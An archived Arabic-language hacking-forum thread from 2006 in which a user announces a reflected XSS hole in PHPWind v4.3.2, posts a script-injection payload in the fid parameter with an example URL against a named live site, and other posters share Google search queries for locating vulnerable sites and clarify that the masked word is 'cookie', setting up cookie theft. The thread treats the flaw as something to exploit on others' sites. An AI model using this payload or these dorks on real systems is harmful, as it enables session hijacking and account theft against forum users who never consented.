اكتشاف XSS في PHPWind v4.3.2 [الأرشيف] - .:: منتديات العاصفة ::.

مشاهدة النسخة كاملة : اكتشاف XSS في PHPWind v4.3.2

BadNet

13-04-2006, 08:02

بسم الله الرحمن الرحيم

السلام عليكم شباب

تم اكتشاف ثغرة من نوع XSS في PHPWind v4.3.2 (( انا الي اكتشفتها |179| ))

thread.php?fid='><script>alert(document.******)</script>

وهذا مثال ::..
http://bbs.91set.net/thread.php?fid='><script>alert(document.******)</script>

طريقة الاستغلال شارحها اخوي القبطان |173|

انشاء الله تستفيدون منها
تحياتي
BadNet

samo_zin123123

13-04-2006, 08:21

معلش هتقل عليك حط لى وصلة شرح اخونا القبطان

متكي ورا الشمس

13-04-2006, 08:21

مبرووك ,,

يعطيك العافيه , بس مالقيت مواقع تستخدم ذا البرنامج |258|

عموما اكتشاف حلو , , واستمر ,, :)

متكي ورا الشمس

13-04-2006, 08:26

معليش ولكن طريقتي بالبحث كانت غلط ,,
لاني بحثت عن

Powered by PHPWind v4.3.2

ولكن للبحث اكثر

http://www.google.com.sa/search?hl=ar&q=inurl%3Athread.php%3Ffid%3D&meta=

http://www.google.com.sa/search?hl=ar&safe=active&q=intitle%3Apowered+by+phpwind.net&meta=

,, يعطيك العافيه يابطل ,,

لاتنسى تسجلها بمواقع السيكورتي ,,

بالتوفيق

_Neo__The_OnE

14-04-2006, 12:07

معلش لو سمحتم سؤال بس

انا هاحط مكان ال العلامات *** دى الكوكيز بتاعتى ولا اية ؟
دى بقى مش موجودة فى شرح القبطان هو كاتب تحط مكان **** الكوكيز
يا ريت حد يرد

BadNet

14-04-2006, 08:39

مشكور اخ امتكي على الرد
منتظر ثغرات يا ذيب

اخ _Neo__The_OnE
مشكورر على ردك
بالنسبة الى سؤالك
استبدل *****
ب C o o k i e
بس بالاستغلال شيل الفواصل .....
مع تحياتي